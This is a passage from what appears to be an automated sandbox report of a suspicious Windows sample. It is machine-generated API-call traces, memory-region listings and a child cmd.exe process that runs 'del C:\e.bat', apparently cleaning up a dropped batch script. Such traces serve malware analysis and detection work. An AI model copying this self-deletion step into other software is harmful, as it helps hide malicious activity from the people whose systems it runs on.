lpMem=0x4777418) returned 1 [0143.325] GetProcessHeap () returned 0x4770000 [0143.325] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777418) returned 0x10 [0143.326] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777418) returned 1 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776598) returned 1 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776598) returned 0x14 [0143.326] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776598) returned 1 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4789220) returned 1 [0143.326] GetProcessHeap () returned 0x4770000 [0143.326] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4789220) returned 0x5a [0143.327] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4789220) returned 1 [0143.327] GetProcessHeap () returned 0x4770000 [0143.327] GetProcessHeap () returned 0x4770000 [0143.327] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776dc8) returned 1 [0143.328] GetProcessHeap () returned 0x4770000 [0143.328] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776dc8) returned 0x14 [0143.328] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776dc8) returned 1 [0143.328] GetProcessHeap () returned 0x4770000 [0143.328] GetProcessHeap () returned 0x4770000 [0143.328] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776b90) returned 1 [0143.328] GetProcessHeap () returned 0x4770000 [0143.328] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776b90) returned 0x14 [0143.328] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776b90) returned 1 [0143.328] GetProcessHeap () returned 0x4770000 [0143.329] GetProcessHeap () returned 0x4770000 [0143.329] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776bb0) returned 1 [0143.329] GetProcessHeap () returned 0x4770000 [0143.329] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776bb0) returned 0x14 [0143.329] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776bb0) returned 1 [0143.329] GetProcessHeap () returned 0x4770000 [0143.329] GetProcessHeap () returned 0x4770000 [0143.329] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776bd0) returned 1 [0143.329] GetProcessHeap () returned 0x4770000 [0143.329] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776bd0) returned 0x14 [0143.329] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776bd0) returned 1 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779508) returned 1 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779508) returned 0x14 [0143.330] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779508) returned 1 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779408) returned 1 [0143.330] GetProcessHeap () returned 0x4770000 [0143.330] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779408) returned 0x14 [0143.331] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779408) returned 1 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776a08) returned 1 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776a08) returned 0x30 [0143.331] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776a08) returned 1 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779328) returned 1 [0143.331] GetProcessHeap () returned 0x4770000 [0143.331] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779328) returned 0x14 [0143.332] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779328) returned 1 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777050) returned 1 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777050) returned 0x30 [0143.332] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777050) returned 1 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779348) returned 1 [0143.332] GetProcessHeap () returned 0x4770000 [0143.332] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779348) returned 0x14 [0143.332] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779348) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779df8) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779df8) returned 0xe [0143.333] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779df8) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4781bc0) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4781bc0) returned 0x14 [0143.333] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4781bc0) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47772c8) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47772c8) returned 0x10 [0143.333] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47772c8) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] GetProcessHeap () returned 0x4770000 [0143.333] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47767c0) returned 1 [0143.333] GetProcessHeap () returned 0x4770000 [0143.334] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47767c0) returned 0x14 [0143.334] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47767c0) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47767e0) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47767e0) returned 0x14 [0143.334] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47767e0) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776800) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776800) returned 0x14 [0143.334] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776800) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776558) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776558) returned 0x14 [0143.334] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776558) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] GetProcessHeap () returned 0x4770000 [0143.334] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773b8) returned 1 [0143.334] GetProcessHeap () returned 0x4770000 [0143.335] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773b8) returned 0x10 [0143.335] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773b8) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776578) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776578) returned 0x14 [0143.335] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776578) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4772788) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4772788) returned 0x14 [0143.335] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4772788) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795a8) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.335] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795a8) returned 0x14 [0143.335] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795a8) returned 1 [0143.335] GetProcessHeap () returned 0x4770000 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795c8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795c8) returned 0x14 [0143.336] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795c8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793c8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793c8) returned 0x14 [0143.336] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793c8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793e8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793e8) returned 0x14 [0143.336] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793e8) returned 1 [0143.336] GetProcessHeap () returned 0x4770000 [0143.336] GetProcessHeap () returned 0x4770000 [0143.337] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779608) returned 1 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779608) returned 0x14 [0143.337] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779608) returned 1 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47772e0) returned 1 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47772e0) returned 0x10 [0143.337] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47772e0) returned 1 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] GetProcessHeap () returned 0x4770000 [0143.337] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727a8) returned 1 [0143.337] GetProcessHeap () returned 0x4770000 [0143.339] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727a8) returned 0x14 [0143.339] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727a8) returned 1 [0143.339] GetProcessHeap () returned 0x4770000 [0143.339] GetProcessHeap () returned 0x4770000 [0143.339] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777388) returned 1 [0143.339] GetProcessHeap () returned 0x4770000 [0143.339] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777388) returned 0x10 [0143.339] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777388) returned 1 [0143.339] exit (_Code=1) Thread: id = 120 os_tid = 0x4dc Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x509dd000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"del C:\\e.bat\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1193 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1194 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1195 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1196 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1197 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1198 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1199 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1200 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1201 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1202 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1203 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1204 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1205 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1206 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1207 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1208 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1209 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1210 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1211 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1212 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1213 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1214 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1215 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1216 start_va = 0x480000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1217 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1218 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1219 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1220 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1221 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1222 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1223 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1224 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1225 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1226 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1227 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1228 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 121 os_tid = 0xab0 [0144.276] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0144.276] __set_app_type (_Type=0x1) [0144.276] __p__fmode () returned 0x74974d6c [0144.276] __p__commode () returned 0x74975b1c [0144.276] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0144.276] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0144.276] GetCurrentThreadId () returned 0xab0 [0144.277] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab0) returned 0x78 [0144.277] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.277] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0144.277] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.283] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.283] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0144.283] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.283] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.283] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.283] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.283] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.283] GetConsoleOutputCP () returned 0x1b5 [0144.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.290] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0144.291] _get_osfhandle (_FileHandle=1) returned 0x130 [0144.291] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0144.291] _get_osfhandle (_FileHandle=1) returned 0x130 [0144.291] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0144.291] _get_osfhandle (_FileHandle=0) returned 0x158 [0144.291] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0144.291] GetEnvironmentStringsW () returned 0x587fb0* [0144.291] GetProcessHeap () returned 0x580000 [0144.291] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa1a) returned 0x5889d8 [0144.291] FreeEnvironmentStringsA (penv="A") returned 1 [0144.291] GetProcessHeap () returned 0x580000 [0144.291] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x4) returned 0x587e38 [0144.291] GetEnvironmentStringsW () returned 0x587fb0* [0144.292] GetProcessHeap () returned 0x580000 [0144.292] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa1a) returned 0x589400 [0144.292] FreeEnvironmentStringsA (penv="A") returned 1 [0144.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.292] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.292] RegCloseKey (hKey=0x88) returned 0x0 [0144.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: 